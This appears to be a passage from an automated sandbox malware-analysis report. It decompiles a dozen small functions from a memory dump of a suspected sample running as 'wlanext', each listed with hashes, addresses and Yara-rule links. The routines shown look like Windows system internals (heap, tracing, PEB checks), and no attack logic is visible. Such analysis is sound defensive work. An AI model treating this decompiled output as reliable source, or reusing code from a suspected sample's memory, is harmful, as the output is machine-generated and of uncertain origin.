                                  • Instruction ID: c98e6f43789161cd8b3292739b2eee3d9f0bbecabe5e428eb2ef38a2b01e04c8
                                  • Opcode Fuzzy Hash: d7ab813b6377030859a89ac1e8845277f293b5dd8c71740a1233a855d45d8a35
                                  • Instruction Fuzzy Hash: BA011A75A01319AFCB00DFA9E9419EEBBB8FF49710F14405AF905EB391D634A9118BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B8ED6 Relevance: .0, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E035B8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x35dd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03507D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0352B640(E03529AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                  0x035b8ed6
                                  0x035b8ee5
                                  0x035b8eed
                                  0x035b8ef0
                                  0x035b8efa
                                  0x035b8f03
                                  0x035b8f0c
                                  0x035b8f15
                                  0x035b8f24
                                  0x035b8f27
                                  0x035b8f31
                                  0x035b8f43
                                  0x035b8f33
                                  0x035b8f3c
                                  0x035b8f3c
                                  0x035b8f4e
                                  0x035b8f4f
                                  0x035b8f51
                                  0x035b8f56
                                  0x035b8f69

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5ae8b6d1f9dfd0807562b8d27cad9a4f84490411bed4451baa5336e34e1e1ae
                                  • Instruction ID: fffcfae2c86b89e2267bbd788bf3bba0b4eb6851c8c390caf1013a606525c9fc
                                  • Opcode Fuzzy Hash: e5ae8b6d1f9dfd0807562b8d27cad9a4f84490411bed4451baa5336e34e1e1ae
                                  • Instruction Fuzzy Hash: 25111E74A002599FDB04DFA8D441BAEFBF4FF08300F0442AAE919EB791E6349940CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EDB60 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034EDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E034EDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E034EE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L034EE8B0(__ecx, _t14, 0xfff);
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                  0x034edb64
                                  0x034edb66
                                  0x034edb6b
                                  0x034edbaa
                                  0x034edb71
                                  0x034edb76
                                  0x034edb7a
                                  0x034edba3
                                  0x034edb7c
                                  0x034edb87
                                  0x034edb8b
                                  0x03544fa1
                                  0x03544fb3
                                  0x03544fb8
                                  0x034edb91
                                  0x034edb96
                                  0x034edb98
                                  0x034edb98
                                  0x034edb8b
                                  0x034edb7a
                                  0x034edb9d
                                  0x034edba2

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                  • Instruction ID: 4cd42a9b0f1184028810c86285fe7591ac295c3c30bf0521a735bec79242dabf
                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                  • Instruction Fuzzy Hash: 0FF09C37A417229FD732DA564880F6BF6959FC7A62F1A0037F1159F348DA608C0396D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EB1E1 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034EB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03507D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03507D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03567016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                  0x034eb1e8
                                  0x034eb1ea
                                  0x034eb1f3
                                  0x03544a17
                                  0x034eb1f9
                                  0x034eb1f9
                                  0x034eb1f9
                                  0x034eb201
                                  0x03544a21
                                  0x03544a2e
                                  0x00000000
                                  0x00000000
                                  0x03544a3b
                                  0x03544a4d
                                  0x03544a3d
                                  0x03544a46
                                  0x03544a46
                                  0x03544a55
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034eb20a
                                  0x034eb20a
                                  0x034eb20a
                                  0x034eb20a

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                  • Instruction ID: 21ab797a4099b17ad8ca325d1fbbe32388e17bbb4ba3307d2ab05152db2b9e85
                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                  • Instruction Fuzzy Hash: 4801F936244A809BD726D75ED808F6ABB99FF81758F0D00A2FE148F7B1D675D800C358
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0357FE87 Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E0357FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x35dd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03507D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0352B640(E03529AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                  0x0357fe96
                                  0x0357fe9e
                                  0x0357fea1
                                  0x0357fead
                                  0x0357feb3
                                  0x0357feb9
                                  0x0357fec3
                                  0x0357fed5
                                  0x0357fec5
                                  0x0357fece
                                  0x0357fece
                                  0x0357fee0
                                  0x0357fee1
                                  0x0357fee3
                                  0x0357fee8
                                  0x0357fefb

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d4dc02264dfa306d5582b8df38e031bea2d11d59fa588b05178d8823e16a23e0
                                  • Instruction ID: e72c1258e2b34ea7c2e38fb686f6dec31faafb0936a2af0b9c05eacfe5dd0f3e
                                  • Opcode Fuzzy Hash: d4dc02264dfa306d5582b8df38e031bea2d11d59fa588b05178d8823e16a23e0
                                  • Instruction Fuzzy Hash: D7016274A00319AFCB14DFA8E542A6EBBF4FF09300F144169A915DF392D635E901CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035A131B Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E035A131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x35dd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03507D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0352B640(E03529AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                  0x035a131b
                                  0x035a132a
                                  0x035a1330
                                  0x035a1336
                                  0x035a133e
                                  0x035a1341
                                  0x035a1344
                                  0x035a134f
                                  0x035a1361
                                  0x035a1351
                                  0x035a135a
                                  0x035a135a
                                  0x035a136c
                                  0x035a136d
                                  0x035a136f
                                  0x035a1374
                                  0x035a1387

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 519ace937b23f430d39a6881210f69c7aefcaa05070da9d36ab196382f043141
                                  • Instruction ID: e478f883665bbb4312e1a2ee1da395268525bd8524b837918a4a2b2156db686a
                                  • Opcode Fuzzy Hash: 519ace937b23f430d39a6881210f69c7aefcaa05070da9d36ab196382f043141
                                  • Instruction Fuzzy Hash: 5D018175A01708AFCB00EFA9E505AAEB7F4FF48300F00405ABC15EB391E630AA00CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B8F6A Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E035B8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x35dd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03507D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0352B640(E03529AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                  0x035b8f6a
                                  0x035b8f79
                                  0x035b8f81
                                  0x035b8f84
                                  0x035b8f8b
                                  0x035b8f91
                                  0x035b8f94
                                  0x035b8f9e
                                  0x035b8fb0
                                  0x035b8fa0
                                  0x035b8fa9
                                  0x035b8fa9
                                  0x035b8fbb
                                  0x035b8fbc
                                  0x035b8fbe
                                  0x035b8fc3
                                  0x035b8fd6

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f8d888d98c2688f18f717e0738eb71f33bdaac3c34adef3df2924ad797959cdf
                                  • Instruction ID: 1e2b7ed4aa115a14bd7019d09fe99324ea645e2c130a23ac4e7adc2dc28b8cd0
                                  • Opcode Fuzzy Hash: f8d888d98c2688f18f717e0738eb71f33bdaac3c34adef3df2924ad797959cdf
                                  • Instruction Fuzzy Hash: 14013174A01249AFCB00EFA8E545AAEB7F4FF48300F144459B905EB390DA34EA10CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035A1608 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E035A1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x35dd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03507D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0352B640(E03529AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                  0x035a1608
                                  0x035a1617
                                  0x035a161d
                                  0x035a1625
                                  0x035a1628
                                  0x035a162b
                                  0x035a1636
                                  0x035a1648
                                  0x035a1638
                                  0x035a1641
                                  0x035a1641
                                  0x035a1653
                                  0x035a1654
                                  0x035a1656
                                  0x035a165b
                                  0x035a166e

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e026524d5c3ed33c7c8cf654693f3630847380a7b6587b18c572a64022f96a9
                                  • Instruction ID: d693b9754d39610c7f21d01e1e474914a7bc8def1c8bb0e0da174f1d1cb0654f
                                  • Opcode Fuzzy Hash: 9e026524d5c3ed33c7c8cf654693f3630847380a7b6587b18c572a64022f96a9
                                  • Instruction Fuzzy Hash: 6FF06275A01758EFCB14EFA8E505E6EBBF4FF49300F044069A915EB3A1E6349A00CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0350C577 Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0350C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0350C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x34c11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E035B88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                  0x0350c577
                                  0x0350c57d
                                  0x0350c581
                                  0x0350c5b5
                                  0x0350c5b9
                                  0x0350c5ce
                                  0x0350c5ce
                                  0x0350c5ca
                                  0x00000000
                                  0x0350c5ca
                                  0x0350c5c4
                                  0x0350c5c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0350c5ad
                                  0x00000000
                                  0x0350c5af

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 969ca1a183d552e53f62f48cb47b9df48828cbeeb66856527305db86505677a1
                                  • Instruction ID: 933deec4a78eb13dd7a2fe73d4667572c946ec32f06b041e94236071fb00e47e
                                  • Opcode Fuzzy Hash: 969ca1a183d552e53f62f48cb47b9df48828cbeeb66856527305db86505677a1
                                  • Instruction Fuzzy Hash: 43F090BA9166949FD731C798E044B22BBE8BB47670F484AA7D4058F1F1D6A6D880C250
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0352927A Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E0352927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0352FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E035292C6(_t11, _t14);
				}
				return _t11;
			}





                                  0x03529295
                                  0x03529299
                                  0x0352929f
                                  0x035292aa
                                  0x035292ad
                                  0x035292ae
                                  0x035292af
                                  0x035292b0
                                  0x035292b4
                                  0x035292bb
                                  0x035292bb
                                  0x035292c5

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                  • Instruction ID: 8b47f6feb62d5fd6cb64e262dc0f87257b6bdb6f4fd1e11ab43c81cbb34f8fef
                                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                  • Instruction Fuzzy Hash: E8E0E5322406012BD711DE06EC80B077A69AFC2B20F054078B9001E292C6E6D81887E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035A2073 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E035A2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0359FD22(__ecx);
				_t19 =  *0x35d849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x35d8748; // 0x0
					if(__eflags <= 0) {
						E035A1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x35d8724 & 0x00000004;
							if(( *0x35d8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x35d8724; // 0x0
					return E03598DF1(__ebx, 0xc0000374, 0x35d5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                  0x035a2076
                                  0x035a2078
                                  0x035a207d
                                  0x035a2083
                                  0x035a20a4
                                  0x035a20aa
                                  0x035a20ac
                                  0x035a20b7
                                  0x035a20ba
                                  0x035a20bc
                                  0x035a20c9
                                  0x035a20c9
                                  0x035a20d0
                                  0x035a20d2
                                  0x00000000
                                  0x035a20d2
                                  0x035a20be
                                  0x035a20c3
                                  0x035a20c5
                                  0x035a20c7
                                  0x00000000
                                  0x00000000
                                  0x035a20c7
                                  0x035a20bc
                                  0x035a20d4
                                  0x035a2085
                                  0x035a2085
                                  0x035a20a3
                                  0x035a20a3

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb7fb91ef2d8897b81325bd67d90f4e27e6e27be3cb63ce8e6d4fdd6ea181e78
                                  • Instruction ID: 0d663124b94f31a9845bd2afca742bf76c255f42f91567de173e1ce3d309ad5a
                                  • Opcode Fuzzy Hash: cb7fb91ef2d8897b81325bd67d90f4e27e6e27be3cb63ce8e6d4fdd6ea181e78
                                  • Instruction Fuzzy Hash: 25F0A72E516A954ADE32FB2C7112BD96BD4F786210F1E0886D4505B234C5358997FA20
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B8D34 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E035B8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x35dd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03507D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0352B640(E03529AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                  0x035b8d34
                                  0x035b8d43
                                  0x035b8d4b
                                  0x035b8d4e
                                  0x035b8d52
                                  0x035b8d5c
                                  0x035b8d6e
                                  0x035b8d5e
                                  0x035b8d67
                                  0x035b8d67
                                  0x035b8d79
                                  0x035b8d7a
                                  0x035b8d7c
                                  0x035b8d81
                                  0x035b8d94

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09f432f9a75fd3bf4f8f242a750bcd18884cc0ec6cff8fc741ee46f77062d67a
                                  • Instruction ID: b0d3b7588438d92145de12b50f840d9fa0d7df9ce4e7cfb39025b1d89da2ec8f
                                  • Opcode Fuzzy Hash: 09f432f9a75fd3bf4f8f242a750bcd18884cc0ec6cff8fc741ee46f77062d67a
                                  • Instruction Fuzzy Hash: 61F0B475A047489FCB14EFB8E441BAEB7B8FF48300F118099E905EB3A0DA34E900C794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B8B58 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 36%
                                  			E035B8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x35dd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03507D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0352B640(E03529AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                  0x035b8b67
                                  0x035b8b6f
                                  0x035b8b72
                                  0x035b8b7d
                                  0x035b8b8f
                                  0x035b8b7f
                                  0x035b8b88
                                  0x035b8b88
                                  0x035b8b9a
                                  0x035b8b9b
                                  0x035b8b9d
                                  0x035b8ba2
                                  0x035b8bb5

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ab6c19db3c569504d322a968fe8c31353f297753b9d5c60d3c05aaf91693c5b
                                  • Instruction ID: 42b0d44e7c46abb53f17ac32a23f4dd392c3113fa625e600a1cb6f314692f468
                                  • Opcode Fuzzy Hash: 7ab6c19db3c569504d322a968fe8c31353f297753b9d5c60d3c05aaf91693c5b
                                  • Instruction Fuzzy Hash: A7F05EB4A04259ABDB14EBB8E906E6EB7B8BF44300F040459A9159B3E0EA34E900C794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E4F2E Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034E4F2E(void* __ecx, char _a4) {
				void* __esi;
